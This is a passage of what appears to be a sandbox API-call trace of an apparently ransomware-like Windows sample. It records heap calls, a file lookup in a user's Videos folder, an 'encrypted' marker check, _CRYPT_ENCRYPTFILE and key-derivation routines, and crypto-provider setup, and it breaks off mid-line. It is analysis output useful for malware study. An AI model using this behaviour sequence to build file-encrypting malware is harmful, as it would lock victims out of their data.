RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0042.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889ac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.727] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0042.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.727] CloseHandle (hObject=0x128) returned 1 [0042.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0042.728] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.728] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.729] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.729] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.729] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.729] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.729] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.729] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.729] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.729] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.729] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55664c50, ftCreationTime.dwHighDateTime=0x1d5bf89, ftLastAccessTime.dwLowDateTime=0x88d86be0, ftLastAccessTime.dwHighDateTime=0x1d5bf3e, ftLastWriteTime.dwLowDateTime=0x88d86be0, ftLastWriteTime.dwHighDateTime=0x1d5bf3e, nFileSizeHigh=0x0, nFileSizeLow=0x8f41, dwReserved0=0x0, dwReserved1=0x777648, cFileName="urM8i1sK.swf", cAlternateFileName="")) returned 0x7c20c0 [0042.729] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.729] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.729] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55664c50, ftCreationTime.dwHighDateTime=0x1d5bf89, ftLastAccessTime.dwLowDateTime=0x88d86be0, ftLastAccessTime.dwHighDateTime=0x1d5bf3e, ftLastWriteTime.dwLowDateTime=0x88d86be0, ftLastWriteTime.dwHighDateTime=0x1d5bf3e, nFileSizeHigh=0x0, nFileSizeLow=0x8f41, dwReserved0=0x0, dwReserved1=0x777648, cFileName="urM8i1sK.swf", cAlternateFileName="")) returned 0x7c20c0 [0042.729] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.730] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="urM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rM8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1sK.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.731] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.731] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.731] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.731] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.731] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.732] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\urM8i1sK.swf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55664c50, ftCreationTime.dwHighDateTime=0x1d5bf89, ftLastAccessTime.dwLowDateTime=0x88d86be0, ftLastAccessTime.dwHighDateTime=0x1d5bf3e, ftLastWriteTime.dwLowDateTime=0x88d86be0, ftLastWriteTime.dwHighDateTime=0x1d5bf3e, nFileSizeHigh=0x0, nFileSizeLow=0x8f41, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="urM8i1sK.swf", cAlternateFileName="")) returned 0x7c2240 [0042.732] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.732] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.732] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.732] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.732] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.732] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.732] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.732] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.732] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.733] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.733] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.733] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.733] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.733] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.734] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.734] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.734] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.734] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.734] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.734] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.734] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.734] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.734] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.734] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.735] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.735] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.735] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.735] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.735] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 